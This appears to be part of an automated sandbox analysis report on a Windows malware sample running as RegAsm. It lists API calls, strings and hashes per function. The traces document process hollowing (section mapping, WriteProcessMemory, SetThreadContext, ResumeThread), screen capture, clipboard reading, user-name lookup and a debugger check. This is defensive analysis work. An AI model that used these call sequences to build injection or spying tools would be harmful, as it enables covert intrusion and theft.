                                  • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                  • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                  APIs
                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                    • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                    • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                  • API String ID: 4127273184-3576401099
                                  • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                  • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                  • String ID:
                                  • API String ID: 4212172061-0
                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID: p'E$JD
                                  • API String ID: 1084509184-908320845
                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                  • String ID:
                                  • API String ID: 2829624132-0
                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: Crypt$Context$AcquireRandomRelease
                                  • String ID:
                                  • API String ID: 1815803762-0
                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                  APIs
                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                  • CloseClipboard.USER32 ref: 0040B760
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: Clipboard$CloseDataOpen
                                  • String ID:
                                  • API String ID: 2058664381-0
                                  • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                  • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-3916222277
                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                  • Opcode Fuzzy Hash: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID: JD
                                  • API String ID: 1084509184-2669065882
                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: InfoLocale
                                  • String ID: GetLocaleInfoEx
                                  • API String ID: 2299586839-2904428671
                                  • Opcode ID: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                  • Opcode Fuzzy Hash: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                  • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                  • Opcode Fuzzy Hash: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                  • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                  • String ID:
                                  • API String ID: 1663032902-0
                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale_abort_free
                                  • String ID:
                                  • API String ID: 2692324296-0
                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                  APIs
                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                  • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                  APIs
                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID:
                                  • API String ID: 1084509184-0
                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                  • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                  • Instruction Fuzzy Hash:
                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                  • DeleteObject.GDI32(?), ref: 00419027
                                  • DeleteObject.GDI32(?), ref: 00419034
                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                  • DeleteDC.GDI32(?), ref: 004191B7
                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                  • DeleteDC.GDI32(?), ref: 00419293
                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                  • String ID: DISPLAY
                                  • API String ID: 479521175-865373369
                                  • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                  • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                  APIs
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                  • GetLastError.KERNEL32 ref: 004184B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                  • API String ID: 4188446516-108836778
                                  • Opcode ID: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                  • Opcode Fuzzy Hash: 270f6f13d6fde63ba60b02dc59acd4711bf4d0802e0e8c14fb5fe4b704ceb149
                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
